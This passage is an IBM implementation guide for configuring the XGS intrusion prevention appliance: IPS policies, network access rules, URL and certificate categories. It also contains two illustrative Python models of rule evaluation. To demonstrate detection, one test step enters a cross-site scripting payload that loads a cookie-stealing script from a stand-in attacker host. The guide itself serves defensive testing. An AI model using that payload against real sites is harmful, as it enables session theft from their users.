Security Center of Excellence
Implementation Guide for IBM Security Network
Protection ('XGS for Techies')
Version 1.6
26 September 2014
Tadashi Tsumura
[email protected]
SWAT
IBM Security Systems
Fadly Yahaya
[email protected]
SWAT
IBM Security Systems
Note: Before using this information and the product it supports, read the information in "Notices."
Edition notice
This edition applies to version 5.2 of IBM Security Network Protection and to all subsequent releases and
modifications until otherwise indicated in new editions.
© Copyright International Business Machines Corporation 2014.
Note to U.S. Government Users Restricted Rights -- Use, duplication or disclosure restricted by GSA ADP Schedule
Contract with IBM Corp.
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Credits
A big thanks to the following people for their input:
Vladimir Jeremic, Product Technical Enablement | IBM Security Systems
Luca Bizzotto, SWAT | IBM Security Systems
Giuseppe Marullo, SWAT | IBM Security Systems
Carlos Caballero, SWAT | IBM Security Systems
Hiroo Hishioka, Software developer | IBM Security Systems
Peter Cogill, Software developer | IBM Security Systems
Acknowledgement
A special thanks goes to our manager Giancarlo V. Marchesi for guiding and supporting us in our
work, providing an environment that encourages and stimulates our creativity.
To Pete Stevenson, we wholeheartedly thank you for the trust and patience you gave us, and for
spurring us on to publish this document.
Our deepest gratitude is also due to the staff of the IBM Australia Development Lab for their
kindness in giving us access to the resources in their lab.
Implementation Guide for IBM Security Network Protection
Document Control Information
Version | Date       | Description
1.0     | 23/11/2013 | Initial Version for XGS 5.1
1.1     | 12/06/2014 | Edited pictures and fonts
1.2     | 13/06/2014 | Added XGS 5.2 features
1.3     | 02/07/2014 | Document review
1.4     | 09/07/2014 | Document review
1.5     | 22/07/2014 | Updated for XGS Demo VM and document review
1.6     | 08/09/2014 | Version for developerWorks release
Revisions by Fadly Yahaya and Tadashi Tsumura.
Table of contents
Introduction
  Purpose
  Required software and hardware
  Before you begin
Use case scenarios
  Overview of XGS policies
Configuring an Intrusion Prevention Policy for blocking web application attacks
  Logging in to XGS
  Configuring Protection Interfaces
  Accessing the Intrusion Prevention Policy
  Accessing the Default IPS object
  Editing the Default IPS object
  Setting the Trust X-Force Default
  Enabling the Event Log
  Accessing the Network Access Policy
  Simulating a Web Application attack
  Adding a script to the Sign In page
  XGS detected and blocked the attack
  Optional: Event data forwarded to SiteProtector and QRadar
Configuring an Intrusion Prevention Policy for blocking malicious files
  Accessing the Intrusion Prevention Policy
  Accessing the Default IPS object
  Editing the Default IPS object
  Setting the Trust X-Force Default
  Enabling the Event Log
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Downloading the malicious file
  XGS detected and blocked the malicious file
Configuring web applications in a Network Access Policy to control user actions and access to certain contents on websites
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Accessing the Web Application
  Viewing Streaming media
  XGS detects and blocks the user from accessing streaming media
Configuring a URL category in a Network Access Policy to control access to certain websites
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Accessing the social media site
  XGS detects and blocks user from accessing sites listed in the URL Category
Configuring a domain certificate category in a Network Access Policy to control access to SSL-enabled websites
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Accessing the social media site
  XGS detects and blocks user from accessing sites listed in the Domain Certificate Category
Configuring non-web applications in a Network Access Policy to block certain applications from communicating on the network
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Installing Skype
  XGS detects and blocks user from connecting to Skype
Configuring IP reputation to block access to external servers
  Accessing the Network Access Policy
  Configuring a Network Access Policy
  XGS detects and blocks user from accessing Anonymous Proxies IP
  Optional: Event data forwarded to SiteProtector and QRadar
Configuring Geolocation to block access to external servers
  Accessing the Network Access Policy
  Configuring a Network Access Policy
  XGS detects and blocks users from accessing IP addresses hosted in the geolocation
  Optional: Event data forwarded to SiteProtector and QRadar
Configuring Local Authentication to control web access based on user identity
  Creating a user for local authentication
  Configuring the IP address for the Protection Interfaces
  Configuring a Network Access Policy rule to authenticate users
  Simulating an unauthenticated user accessing a website
  Recommended rule order for enforcing user authentication using the Network Access Policy
Configuring passive authentication with the Active Directory server
  Setting up Active Directory Domain Service
  Creating a Domain user on Active Directory
  Configuring a Windows client for Active Directory
  Downloading the XGS SSL server certificate
  Configuring the Logon-event Scanner
  Configuring Remote Directory Servers
  Configuring Passive Authentication
  Configuring a Network Access Policy
  Simulating Passive Authentication
  Troubleshooting issues associated with the Logon-event Scanner
Configuring an Outbound SSL Inspection policy to control access to SSL-enabled websites
  Verifying the SSL Inspection license
  Configuring the Protection Interface
  Configuring an Outbound SSL Inspection policy rule
  Configuring a Network Access Policy rule
  Downloading the CA certificate from XGS
  Configuring the client's Web Browser with the CA certificate from XGS
  Accessing the SSL-enabled website
Configuring an Outbound SSL Inspection policy to block web-based attacks over HTTPS
  Configuring SSL Inspection Settings
  Accessing the Intrusion Prevention Policy
  Accessing the Default IPS object
  Editing the Default IPS object
  Setting the Trust X-Force Default
  Enabling an Event Log
  Enabling the HTTP_Get audit signature in the Default IPS object
  Accessing the Network Access Policy
  Configuring a Network Access rule
  Simulating an attack over HTTPS
Configuring the Inbound SSL Inspection policy to decrypt inbound HTTPS traffic
  Preparing the SSL certificate and private key of target servers
  Configuring Inbound SSL Certificates
  Configuring the Inbound SSL Inspection Policy
  Testing Inbound SSL Inspection
Configuring the IPS Event Filter
  Accessing the IPS Event Filter policy
  Simulating a Web Application attack
  Adding a script to the feedback entry
  XGS generates a Security Event with a different Threat Level
Configuring a packet-capture response to log evidence of an attack
  Accessing the IPS Event Filter policy
  Simulating a Web Application attack
  Adding a script to the feedback entry
  XGS generates IPS Event and the associated packet capture
Configuring a Quarantine response
  Creating an IPS Event Filter policy with a Quarantine object
  Simulating a web application attack
  Verifying the IPS Event Filter response and quarantine rule
Configuring the IP reputation, IP location, and IDS (monitoring) mode
  Ensuring that the IP Reputation Database is updated
  Enabling the IP Reputation for events
  Configuring the Inspection mode for the Protection Interfaces
  Simulating traffic
  XGS detects attack and identifies IP and Location reputation for the event generated
Configuring QRadar Right-click integration
  Configuring a QRadar Advanced Threat Protection agent on XGS
  Configuring the RightClick module on the QRadar console
  Generating an ISNP alert from the QRadar console
  Verifying the ATP response in XGS
  Optional: Deleting the Active Quarantine rule
Customizing QRadar Right-click integration
  Configuring the QRadar Right-Click option
  Creating a new quarantine response
  Generating the custom ISNP alert from QRadar console
  Verifying the ATP response in XGS
Configuring Generic ATP agent integration
  Configuring a generic ATP agent on XGS
  Generating an Advanced Threat alert using the curl command
  Verifying the ATP response in XGS
Configuring FireEye Web MPS integration
  Configuring a FireEye ATP agent on XGS
  Configuring event notifications on the FireEye WebMPS
  Mapping FireEye notifications to ATP events
  Optional: Generating a FireEye event using the FireEye web console
  Connecting to the FireEye CLI console to send test notification
  Testing a Malware Callback event
  Testing a Malware Object event notification
  Testing Web Infection event notification
Integrating with SiteProtector
Installing an XGS fix pack
Creating a PDF file for IPS testing
Preparing a virtual environment for study
Notices
Introduction
This document details how to configure and showcase the features of the IBM Security Network Protection (XGS) system for a deployment or a Proof of Concept (PoC). XGS is a next-generation Intrusion Prevention System (IPS) that combines intrusion prevention with security awareness and control of applications, content, and users.
XGS provides next-generation intrusion prevention functionality for 10 gigabit and 1 gigabit Ethernet networks. XGS functionality includes botnet command and control protection, malware protection, Secure Sockets Layer (SSL) man-in-the-middle inspection of encrypted traffic, firewall protection of web applications, application and application action control, protocol analysis-based intrusion prevention, URL filtering, Injection Logic Protection, Shell Code heuristics, and virtual patching.
XGS is designed to:
- Help stop threats from compromising unpatched vulnerabilities without sacrificing high-speed network performance.
- Provide visibility into SSL encrypted traffic.
- Deliver a flexible licensing model for paying for performance, helping you control costs.
- Help protect against botnet command and control as well as web-based malware.
- Deliver a modular XGS to enable easy transition from 1 gigabit networks to 10 gigabit networks.
- Decrease hardware support costs by using solid state disk drives and providing a simplified customer replaceable and field replaceable experience for various hardware components.
- Help protect networks, servers, desktops, and business critical applications from malicious threats.
- Conserve network bandwidth and provide insight into what users are doing on the corporate network. It helps control user bandwidth consumption by limiting or eliminating access to non-business critical applications.
- Help enforce compliance and internal corporate usage of non-business critical applications such as social networking, peer-to-peer file transfers, instant messaging traffic, and streaming media.
- Provide an extensible security platform that can grow as threats evolve, help consolidate network protection technologies, and help reduce the cost of deploying and managing point solutions.
Purpose
The goal of this document is to provide IBM employees with technical details about configuring XGS and explaining its features and capabilities to customers.
This document contains information that can help with transitioning from GX (IBM Security Network IPS) to XGS.
This document does not focus on the initial setup and installation of XGS and SiteProtector™. For the following procedures, refer to the online product documentation:
- Connecting cables and starting XGS
- Accessing the local management interface
- Using the LCD
- Changing passwords
- Configuring management interfaces
- Configuring host name and DNS information
- Configuring protection interfaces
- Configuring date and time settings
- Installing licenses
- Installing updates
- System requirements for SiteProtector
- Installing SiteProtector
Reference: IBM Security Network Protection V5.2 documentation
http://www-01.ibm.com/support/knowledgecenter/SSHLHV_5.2.0/com.ibm.alps.doc/alps_collateral/alps_dochome_stg.htm
Reference: IBM Security SiteProtector System V3.1.0 documentation
http://www-01.ibm.com/support/knowledgecenter/SSETBF_3.1.0/com.ibm.siteprotector.doc/sp_collateral/sp_dochome_stg.htm
Required software and hardware
This section describes the software and hardware required for the deployment and PoC.
IBM Security Network Protection: XGS protects business-critical network infrastructure through a combination of threat protection, visibility, and control. IBM extends the abilities of traditional intrusion prevention systems by offering a next-generation solution that gives network security professionals security, visibility, and control over their network. By combining several advanced capabilities, this solution can help prevent threats, provide critical insight into network activities, and enable granular application control, helping to establish a new level of integrated, simplified security.
IBM Security SiteProtector System: SiteProtector is a centralized management system that unifies management and analysis for network, server, and endpoint security agents, including XGS. It reduces the cost and complexity of security management, helps you monitor and measure your exposure to vulnerabilities, and demonstrates regulatory compliance. The IBM Security SiteProtector system can help minimize your overall risk and increase the efficacy of your security team, while optimizing cost efficiency.
Before you begin
Ensure that you have at least the following licenses and that they have not expired.
Important: These licenses ensure that you are able to update XGS and SiteProtector with the latest updates and firmware. The licenses also entitle you to request IBM Support for help should a technical issue arise.
The following example shows 30-day licenses for all features, functionality, and updates for the XGS virtual appliance for Demo.
Use case scenarios
Overview of XGS policies
The Network Access Policy (NAP), the Outbound SSL Inspection policy, the Inbound SSL
Inspection policy, the Intrusion Prevention Policy (IPP), and the IPS Event Filter policy
relate to one another at a basic level. The NAP controls the traffic flow, the Outbound SSL
Inspection policy and Inbound SSL Inspection policy enforce rules that specify which traffic is
decrypted for inspection, the IPP analyzes the traffic, and the IPS Event Filter policy creates
exceptions to the analysis.
A network packet takes the following path as it passes through XGS:
1. Protection Interface
2. Network Access Policy
3. Outbound/Inbound SSL Inspection Policy, if the traffic is encrypted
4. SSL Inspection Settings, if outbound traffic is decrypted
5. IPS Event Filter Policy
6. Intrusion Prevention Policy
While this list describes the basic packet flow through the device, note that evaluating the Network Access Policy rules is not a one-time event. In some cases XGS must defer a decision, for example on an "Application" match, because the flow is encrypted and the application cannot be identified until the traffic has been decrypted. In such cases the Network Access Policy is evaluated again after decryption.
Example: If a rule is present to block Twitter and the user accesses Twitter over HTTPS, the connection is not blocked until XGS has decrypted the stream, which requires a matching Outbound SSL Inspection rule. Only then is Network Access Policy rule processing complete, so in this example the effective flow is [Network Access Policy] > [Outbound SSL Inspection] > [SSL Inspection Settings] > [Network Access Policy] before the final block. If Outbound SSL Inspection is not configured for that traffic, an application-based rule cannot match the encrypted flow; to control access to SSL-enabled sites without decrypting them, use a rule based on a domain certificate category instead, which matches on the server certificate presented in the TLS handshake (see the corresponding use case later in this guide).
Reference: http://www-01.ibm.com/support/docview.wss?uid=swg21667625
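The deferred evaluation described above is easy to get wrong when writing rules, so the following toy model of the policy order is added here as an illustration. It is not IBM code and does not reproduce the real XGS engine: the class names, the "block Twitter" rule, the destination names and the decision that an undecrypted flow falls through to the remaining rules are all assumptions. It runs the same HTTPS flow with and without an Outbound SSL Inspection rule and records which policies handled it, so the [NAP] > [Outbound SSL Inspection] > [SSL Inspection Settings] > [NAP] path from the text, and the case where the block silently does not apply, can both be seen.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


@dataclass
class Flow:
    """One client connection as XGS sees it (constructed test data)."""
    src: str
    dst: str
    dport: int
    encrypted: bool
    application: Optional[str] = None   # known only once plaintext is visible
    ssl_checked: bool = False           # set after the SSL policies have run
    trace: List[str] = field(default_factory=list)  # policies that handled it


@dataclass
class NapRule:
    """Simplified Network Access Policy rule (assumed shape, not the LMI's)."""
    name: str
    action: str                          # "Accept" or "Reject"
    application: Optional[str] = None    # match on identified application
    dport: Optional[int] = None          # match on destination port


def evaluate_nap(flow: Flow, rules: List[NapRule]) -> Optional[str]:
    """First-match evaluation of the Network Access Policy.

    Returns the matching rule's action, or None when a rule needs the
    application identity of a flow that is still encrypted: the decision is
    deferred until the SSL Inspection policies have had their turn.
    """
    flow.trace.append("Network Access Policy")
    for rule in rules:
        if rule.dport is not None and rule.dport != flow.dport:
            continue
        if rule.application is not None:
            if flow.encrypted and not flow.ssl_checked:
                return None
            if flow.application != rule.application:
                continue
        return rule.action
    return "Accept"   # assumption: no matching rule means the flow is allowed


def outbound_ssl_inspection(flow: Flow, decrypt_ports: Set[int],
                            app_behind: Dict[str, str]) -> bool:
    """Model of the Outbound SSL Inspection policy.

    If a decrypt rule matches, XGS terminates TLS towards the client
    (man-in-the-middle), the plaintext becomes visible and the application
    can be identified. Returns True when the flow was decrypted.
    """
    flow.trace.append("Outbound SSL Inspection")
    flow.ssl_checked = True
    if flow.dport not in decrypt_ports:
        return False
    flow.trace.append("SSL Inspection Settings")
    flow.encrypted = False
    flow.application = app_behind.get(flow.dst)
    return True


def process(flow: Flow, nap_rules: List[NapRule], decrypt_ports: Set[int],
            app_behind: Dict[str, str]) -> str:
    """Run one flow through the policy order described in the text."""
    action = evaluate_nap(flow, nap_rules)
    if action is None:                       # deferred: decrypt, then re-check
        outbound_ssl_inspection(flow, decrypt_ports, app_behind)
        action = evaluate_nap(flow, nap_rules)
    if action == "Accept":                   # only allowed flows reach the IPS
        flow.trace += ["IPS Event Filter Policy", "Intrusion Prevention Policy"]
    return action


def demo() -> Dict[str, tuple]:
    """Three constructed flows against a single 'block Twitter' rule."""
    rules = [NapRule("Block Twitter", "Reject", application="Twitter")]
    apps = {"twitter.com": "Twitter"}       # what decryption would reveal
    results = {}

    https = Flow("10.0.0.5", "twitter.com", 443, encrypted=True)
    results["https_with_ssl_inspection"] = (
        process(https, rules, {443}, apps), https.trace)

    https_no_decrypt = Flow("10.0.0.5", "twitter.com", 443, encrypted=True)
    results["https_without_ssl_inspection"] = (
        process(https_no_decrypt, rules, set(), apps), https_no_decrypt.trace)

    http = Flow("10.0.0.5", "twitter.com", 80, encrypted=False,
                application="Twitter")
    results["http"] = (process(http, rules, set(), apps), http.trace)
    return results


if __name__ == "__main__":
    for name, (action, trace) in demo().items():
        print(f"{name}: {action} via {' > '.join(trace)}")
```

The second case is the one to check for in a PoC: with no Outbound SSL Inspection rule covering port 443, the application rule never matches and the HTTPS flow is accepted and passed on to the IPS, even though the same site over plain HTTP is rejected on the first pass through the Network Access Policy.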
Configuring an Intrusion Prevention Policy for
blocking web application attacks
This use case describes how to configure the Intrusion Prevention Policy to block web application attacks. In this example, XGS blocks the attack when an end user attempts to inject a malicious script into the vulnerable web application.
Logging in to XGS
XGS offers a browser-based graphical user interface for local, single XGS management.
Launch a web browser to log in to the local management interface (LMI) of XGS.
To log in to the local management interface, type the IP address or host name of XGS in the web
browser.
Configuring Protection Interfaces
Use the Protection Interfaces page to configure the Protection Mode and the Speed and
Duplex mode for each interface. To navigate to Protection Interfaces, click the Manage System
Settings link from the main menu, and then click Protection Interfaces under Network
Settings.
Select the Protection Interface check box and click Edit.
For Inspection Mode, select Protection. Click Save Configuration. Click Deploy.
Accessing the Intrusion Prevention Policy
To navigate to the Intrusion Prevention Policy, click the Secure Policy Configuration link from
the main menu, and then click Intrusion Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel.
Select the Default IPS object.
The Default IPS object contains the security events recommended by IBM
X-Force configured with specific settings and responses to protect against a wide
range of threats. This is an example of how easy it is to use the feature.
Note:
The User Overridden attribute of a security event indicates whether it has been
modified from the original X-Force configuration. If a security event in the Default IPS
object is User Overridden, XGS does not apply the settings and responses that
X-Force prescribes for the event. The modified security event acts as configured by
its overridden settings.
Tip: You can use the filter
button to search for specific signatures of interest,
based on the column information such as Event Name.
Tip: Configure IPS objects from the Network Access Policy as a convenience.
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
Setting the Trust X-Force Default
Make the following changes on the General Configuration tab of the Edit IPS Object window:
1. For Name, enter Default IPS.
2. For Comment, enter X-Force Recommended IPS Policy.
3. For Enable X-Force Level Signatures, select Aggressive.
4. Select the Enable X-Force Protection Level Blocking check box.
5. For Content Update Trust Level, select Current.
Note: To simplify the deployment of XGS in real-life environments, IBM X-Force
specifies the four protection levels of default signatures and recommended responses,
such as block, in each X-Press Update (XPU).
Enabling the Event Log
Add the Event Log object to Added Objects. Click Save Configuration and Click Deploy.
The Event Log object adds a record to the Event Log file when a policy rule is triggered or when
a system event occurs. In this instance, when an Intrusion Policy rule (i.e. HTTP_POST_Script)
is triggered, an event will be generated.
If an Event Log object is added to a Network Access Policy rule, XGS generates an event for
any packet that matches the rule.
You can also use the packet capture objects to record a packet capture when
an IPS Event Filter policy rule or an Intrusion Prevention policy rule is triggered.
Packet capture objects have been available as responses in a Network Access Policy
rule since firmware version 5.2.
Note:
Capture Packet - XGS captures only the offending packet. When you use a capture
packet object, XGS produces a capture file for only the first event in a flow. If you
want XGS to capture all the offending packets, use a capture connection object.
Capture Connection - XGS captures all packets in the connection, starting with the
offending packet. XGS captures packets until the connection ends or until the
configurable limit is reached.
Tip: You can apply only one packet capture object to a rule.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu, and then click Network Access Policy under the Security Policies.
Note: The Network Access Policy allows XGS to analyze network traffic based on
the following six attributes of each packet flow, allowing precise specification of
access control and security policy:
- source address
- source port
- destination address
- destination port
- transport protocol
- application protocol
In XGS, a network packet is processed by the first rule it matches. That is, if a packet encounters
a rule that matches it, the packet never gets to a later rule. In the following example, once a
packet matches Rule 3, it will not be evaluated by Rule 4.
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, set the
Action to Accept. Click Save Configuration and click Deploy.
Tip: Place specific rules before general ones, because rules are applied in the order
in which they are listed on the Network Access Policy page.
Before you create a Network Access rule, define the Network Objects to use in the
rule.
After you create or edit your Network Access Policy, you must deploy the rules before
the changes will take effect.
Long, complicated, and overlapping rule sets take longer to process than simple,
shorter ones.
To optimize processing time, avoid rule sets that contain the following elements:
- many overlapping groups of host addresses
- many individual users
- many large groups of users
Consider adding a "match anything" rule at the end. The system applies the Default
IPS policy to unmatched packets.
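The first-match behaviour of the Network Access Policy and the "specific before general" ordering tip can be checked mechanically. The following is an added example, not IBM's code or the XGS rule engine: a small model that matches a flow against the six attributes listed above, applies first-match semantics, and reports rules that an earlier rule shadows. Rule shapes, field names and addresses are constructed for illustration.

```python
"""
Added example (not IBM's code): a minimal model of Network Access Policy
evaluation. Flows are matched on the six attributes the guide lists, the
first enabled rule that matches wins, and a later rule whose match set is
fully covered by an earlier rule is reported as shadowed.
Rule shapes, flow fields and addresses are constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

ANY = "Any"


@dataclass
class Rule:
    order: int
    action: str                     # "Accept" or "Reject"
    source: str = ANY               # CIDR such as "192.168.5.0/24", or ANY
    destination: str = ANY
    src_port: Optional[int] = None  # None matches any port
    dst_port: Optional[int] = None
    transport: str = ANY            # "tcp", "udp", or ANY
    application: str = ANY          # application protocol name, or ANY
    enabled: bool = True

    def matches(self, flow: dict) -> bool:
        """True if every attribute of the rule accepts the flow's value."""
        return (
            _addr_in(self.source, flow["src"])
            and _addr_in(self.destination, flow["dst"])
            and self.src_port in (None, flow["sport"])
            and self.dst_port in (None, flow["dport"])
            and self.transport in (ANY, flow["transport"])
            and self.application in (ANY, flow["app"])
        )


def _addr_in(pattern: str, addr: str) -> bool:
    return pattern == ANY or ip_address(addr) in ip_network(pattern, strict=False)


def _net_covers(a: str, b: str) -> bool:
    """True if network pattern a contains every address that b contains."""
    if a == ANY:
        return True
    if b == ANY:
        return False
    return ip_network(a, strict=False).supernet_of(ip_network(b, strict=False))


def _covers(earlier: Rule, later: Rule) -> bool:
    """True if every flow matching `later` would already match `earlier`."""
    return (
        _net_covers(earlier.source, later.source)
        and _net_covers(earlier.destination, later.destination)
        and earlier.src_port in (None, later.src_port)
        and earlier.dst_port in (None, later.dst_port)
        and earlier.transport in (ANY, later.transport)
        and earlier.application in (ANY, later.application)
    )


def evaluate(rules, flow):
    """First-match semantics: return (order, action) of the first enabled
    rule that matches, or None when no rule matches the flow."""
    for rule in sorted(rules, key=lambda r: r.order):
        if rule.enabled and rule.matches(flow):
            return rule.order, rule.action
    return None


def shadowed(rules):
    """Orders of enabled rules that can never be the first match because an
    earlier enabled rule covers everything they would match."""
    ordered = [r for r in sorted(rules, key=lambda r: r.order) if r.enabled]
    return [later.order for i, later in enumerate(ordered)
            if any(_covers(earlier, later) for earlier in ordered[:i])]


# Constructed sample policy: a "match anything" Accept rule placed first
# shadows the more specific Reject rule behind it.
WRONG_ORDER = [
    Rule(1, "Accept"),
    Rule(2, "Reject", destination="10.0.0.0/8", dst_port=443,
         transport="tcp", application="Skype"),
]
RIGHT_ORDER = [
    Rule(1, "Reject", destination="10.0.0.0/8", dst_port=443,
         transport="tcp", application="Skype"),
    Rule(2, "Accept"),
]
# Constructed flow: an internal client reaching a server over TCP/443,
# identified by the application attribute as Skype.
SKYPE_FLOW = {"src": "192.168.5.20", "dst": "10.1.2.3", "sport": 51000,
              "dport": 443, "transport": "tcp", "app": "Skype"}

if __name__ == "__main__":
    print(evaluate(WRONG_ORDER, SKYPE_FLOW), shadowed(WRONG_ORDER))
    print(evaluate(RIGHT_ORDER, SKYPE_FLOW), shadowed(RIGHT_ORDER))
```

With the general Accept rule first, the flow is accepted and rule 2 is reported as shadowed; swapping the order makes the Reject rule the first match and leaves nothing shadowed.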
Tip: The Network Access rule allows you to control traffic flow between hosts,
segments, or the entire subnet. It works like Firewall rules.
You can configure the Source tab in a Network Access rule with the IP address, IP
address range, Subnet, List of Addresses, Geolocation, VLAN IDs, Adapters (NIC) on
XGS, or users and groups of users. You can choose users from the local user
database or from remote directory (LDAP / Active Directory) servers. Both IPv4 and IPv6
formats are supported. To specify a group of hosts by their virtual LAN (VLAN) ID,
select the VLAN ID tab, and then type one or more VLAN IDs. To specify a group of
hosts by the physical interface they are connected to, select the Adapters tab, and
then select the interface.
The Destination tab in a Network Access Policy can be configured only with the IP
address, IP address range, Subnet, List of Addresses, Geolocation, VLAN IDs and
Adapters (NIC) on XGS.
You can configure the Application tab in the Network Access rule with source ports
and destination ports by defining a Non-web Application object.
Tip: Based on the above attributes (Source, Destination, Application, Inspection), the
Network Access Policy allows for Protection Domains and Connection Events to
be configured in XGS.
Protection Domains and Connection Events are features available in the GX.
Simulating a Web Application attack
Launch a browser and access the vulnerable web server hosted by IBM. Click the Sign In link.
Adding a script to the Sign In page
For Username, enter <script src="http://hackerx.org/stealcookie.js"></script>. For
Password, enter any string. Click Login.
XGS blocks the access.
XGS detected and blocked the attack
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab.
XGS has generated an event for the associated attack.
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
XGS sends the following remote syslog event to the QRadar Console when the Remote Event
Log object is configured as a response in the Network Access Policy rule.
Configuring an Intrusion Prevention Policy for blocking malicious files
This use case describes how to configure the Intrusion Prevention Policy to block file-based
attacks. In this example, XGS blocks a malicious file when an end user attempts to download it
from a web server.
Accessing the Intrusion Prevention Policy
Launch a web browser to log on to the XGS LMI. To navigate to the Intrusion Prevention Policy,
click the Secure Policy Configuration link from the main menu and then click Intrusion
Prevention Policy under the Security Policies.
Accessing the Default IPS object
Expand the left panel. Select the Default IPS object.
Editing the Default IPS object
Right-click the Default IPS object and select Edit.
Setting the Trust X-Force Default
Make the following changes on the General Configuration tab of the Edit IPS Object window:
1. For Name, enter Default IPS.
2. For Comment, enter X-Force Recommended IPS Policy.
3. For Enable X-Force Level Signatures, select Aggressive.
4. Select the Enable X-Force Protection Level Blocking check box.
5. For Content Update Trust Level, select Current.
Note: To simplify the deployment of XGS in real-life environments, IBM X-Force
specifies the default signatures and recommended responses in each X-Press
Update (XPU).
Implementation Guide for IBM Security Network Protection
Enabling the Event Log
Add the Event Log object to Added Objects. Click Save Configuration and Deploy.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Add/Edit a rule so that at least one rule uses the Default IPS object for inspecting network
packets for attacks. Enable the rule, set the Source to Any, set the Destination to Any, and set
the Action to Accept. Click Save Configuration and Deploy.
Downloading the malicious file
Launch a browser and download a file from the vulnerable web server:
http://192.168.5.111/xgs4techies.pdf.
Note: See Creating a PDF file for IPS testing to prepare the PDF file for testing.
XGS blocks the access and the download fails.
XGS detected and blocked the malicious file
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated events for the
associated attack.
Configuring web applications in a Network Access Policy to control user actions and access to certain contents on websites
This use case describes how to configure the Network Access Policy to control a user’s access
to a web application and the actions that are permitted, such as uploading files, posting
comments, or viewing movie clips. In this example, XGS allows a user access to a news site but
prevents the user from accessing streaming media.
Accessing the Network Access Policy
Launch a web browser to log on to the XGS LMI. To navigate to the Network Access Policy, click
the Secure Policy Configuration link from the main menu and then click Network Access
Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
Note: By default, a new rule is placed in the list below the rule you previously
selected. If no rule is selected, the new rule is placed at the end of the rule list.
On the Response tab, add the Event Log object to Added Objects.
On the Source tab, add Any to Added Objects and leave the others in Available Objects. On the
Destination tab, add Any to Added Objects and leave the others in Available Objects.
On the Application tab, click New and select Web Application.
Note: Use Web Application objects to control access to categorized types of
web-based applications and to control how people use them on your network. The
Network Protection database provides an indexed list of Web Application categories
that you can block or limit access to on your network. These categories include web
mail, social networking, and gaming sites.
In addition to blocking or limiting these site categories, you can prohibit users from
performing specific actions on many of these sites. In this example, you can allow
users to view social media sites such as YouTube or Flickr, but not allow users to post
to them. Or you can allow users to view and to post to networking sites, such as
Facebook or Myspace, but not to upload photos or to play games.
In the Add Web Application window, specify the Name on the General Configuration tab.
On the Web Applications tab, click the Filter button and create a filter using the following
parameters:
Match: all rules
Column: Category
Condition: contains
Value: news
The Filter returns a list of Web Applications with news content and the associated Actions. Add
cnn.com – Stream/Download to the Added Web Application Actions list. Click Save
Configuration.
On the Application tab, add the newly created Web Application object to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Click Save Configuration and Deploy.
The new Network Access rule is deployed.
Accessing the Web Application
Launch a browser and navigate to http://www.cnn.com.
Your browser is redirected to a new site.
Viewing Streaming media
Scroll down to the streaming media content and click a video to view it.
XGS blocks the access.
XGS detects and blocks the user from accessing streaming media
To navigate to Network Access Events, click the Monitor Analysis and Diagnostics link from
the main menu and then click Event Log. Select the Network Access Events tab. XGS has
generated an event for the associated network activity.
Hover over the event to view the details. In this example, rule 1, the
Network Access Policy rule was triggered.
Configuring a URL category in a Network Access Policy to control access to certain websites
This use case describes how to configure a Network Access Policy to control the user’s access
to a specific URL Category. In this example, XGS blocks the user’s access to social media sites
using a URL Category.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, click New and select URL Category.
Note: Use the URL Category objects to control access to certain types of websites
and to non-categorized web-based applications on your network.
The Network Protection database provides an indexed list of URL categories that you
might want to block or to limit access to on your network. These categories include
pornography, gambling, shopping, and social networking.
Tip: Use the Unknown URLs category to block or to log traffic to any URL that is not
categorized in the Network Access database.
In the Add URL Category window, specify the Name for the object.
Scroll down to Entertainment/Culture and expand the category.
Scroll down and select the Social Media check box, and then click Save Configuration.
Add the new category to Added Objects.
On the Inspection tab, add Default IPS object to Added Objects. On the Schedule tab, leave
Added Objects empty. Click Save Configuration and Deploy.
Accessing the social media site
Launch a browser and browse to http://flickr.com.
XGS intercepts access to the site.
XGS detects and blocks the user from accessing sites listed in the URL Category
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
Configuring a domain certificate category in a Network Access Policy to control access to SSL-enabled websites
This use case describes how to configure a Network Access Policy to control the user’s access
to a specific Domain Certificate Category. In this example, XGS blocks the user’s access to
web storage sites using a Domain Certificate Category.
Note: A Domain Certificate List can be used in a Network Access Policy to allow or
deny access to a list of specific domains independent of a Domain Certificate
Category.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
